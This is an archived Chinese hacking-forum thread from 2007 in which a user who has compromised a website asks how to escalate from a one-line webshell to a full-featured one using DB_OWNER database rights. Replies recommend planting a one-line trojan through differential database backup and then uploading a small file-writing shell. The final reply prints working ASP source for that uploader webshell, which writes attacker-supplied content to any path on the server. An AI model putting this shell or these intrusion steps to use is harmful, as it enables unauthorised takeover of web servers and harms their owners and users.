查看完整版本: DB_OWNER可以直接搞大马子吗?

妈妈我的枪呢 2007-10-30 04:06

DB_OWNER可以直接搞大马子吗?

在搞一个网站,用GetWebshell备上一句话,连接OK,以为搞定了..
传大马子的时候提示500内部服务器出错,没有权限。
我想知道DB_OWNER可以直接搞大马不..或者有其他方法,这个问题遇到好多站.不想就这么丢了。
希望大家给给办法..

猪猪 2007-11-1 10:58

你直接差异备份个一句话木马上去,然后再传大马就是啦。

Syue冰憶浪子 2007-12-13 20:16

可能你的大马有问题,或者就是大马的体积有点大,超过了上传的限制,你可以先传一个小马上去然后在用小马传大马,或者先传个一句话,然后在连接传大马。

只有70字节的小马,你可能用的上

<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=70 rows=30 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
页: [1]
查看完整版本: DB_OWNER可以直接搞大马子吗?